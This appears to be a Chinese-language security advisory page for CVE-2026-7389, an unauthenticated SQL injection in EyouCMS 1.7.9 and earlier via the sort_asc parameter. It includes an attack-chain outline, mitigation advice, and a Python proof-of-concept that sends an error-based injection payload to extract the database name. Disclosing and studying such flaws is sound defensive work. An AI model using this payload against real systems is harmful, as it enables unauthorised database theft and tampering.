CVE-2026-7389 CVSS 7.3 高危

CVE-2026-7389 EyouCMS SQL注入漏洞

披露日期: 2026-04-29

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7389

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

EyouCMS

漏洞概述

EyouCMS 1.7.9及以下版本存在SQL注入漏洞。由于`application/common.php`文件中的`GetSortData`函数未正确过滤用户输入的`sort_asc`参数，攻击者可发起远程攻击。该漏洞利用无需认证，可能导致数据库信息泄露及数据完整性受损，目前厂商尚未发布修复补丁。

技术细节

该漏洞源于EyouCMS在处理排序逻辑时存在缺陷。在`application/common.php`的`GetSortData`函数中，直接将用户可控的`sort_asc`参数拼接到SQL查询语句中，缺乏有效的安全过滤或预编译处理。攻击者无需登录即可向受影响接口发送特制的HTTP请求，注入恶意SQL代码。成功利用该漏洞可导致数据库敏感信息被窃取、数据被篡改或删除，对系统构成严重安全威胁。

攻击链分析

STEP 1

步骤1：信息侦察

攻击者识别目标网站是否使用EyouCMS系统，并确认版本在1.7.9及以下。

STEP 2

步骤2：构造Payload

攻击者构造针对`sort_asc`参数的恶意SQL注入Payload。

STEP 3

步骤3：发送请求

向受影响的接口（如列表页）发送包含恶意参数的HTTP GET/POST请求。

STEP 4

步骤4：执行注入

服务器端`GetSortData`函数处理参数，将Payload拼接到SQL语句中并交由数据库执行。

STEP 5

步骤5：获取数据

攻击者根据数据库返回的错误信息或查询结果，获取敏感数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit(url):
    # Target endpoint example
    target = f"{url}/index.php"
    
    # Payload for SQL Injection based on 'sort_asc' parameter
    # This payload attempts to extract the database name using error-based injection
    payload = "1 AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(database(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)"
    
    params = {
        "sort_asc": payload
    }
    
    try:
        response = requests.get(target, params=params, timeout=10)
        if response.status_code == 200:
            print("[+] Request sent successfully.")
            print("[+] Check the response content for database errors or leaked data.")
            print(response.text[:500]) # Print first 500 chars for demo
        else:
            print(f"[-] Server returned status code: {response.status_code}")
    except Exception as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    target_url = "http://127.0.0.1"
    exploit(target_url)

影响范围

EyouCMS <= 1.7.9

防御指南

临时缓解措施

在官方未发布修复补丁前，建议开发者手动修改`application/common.php`文件中的`GetSortData`函数。具体操作为：在接收到`sort_asc`参数后，使用`intval()`或类似函数将其强制转换为整数，防止恶意SQL字符串被执行。同时，限制数据库用户的权限，避免使用root等高权限账号连接数据库。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7389
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7389
3 Details https://www.cvedetails.com/cve/CVE-2026-7389/
4 VulDB https://vuldb.com/cve/CVE-2026-7389
5 Link https://gitee.com/weng_xianhu/eyoucms/issues/IILFPE
6 Link https://vuldb.com/submit/803103
7 Link https://vuldb.com/vuln/360114
8 Link https://vuldb.com/vuln/360114/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表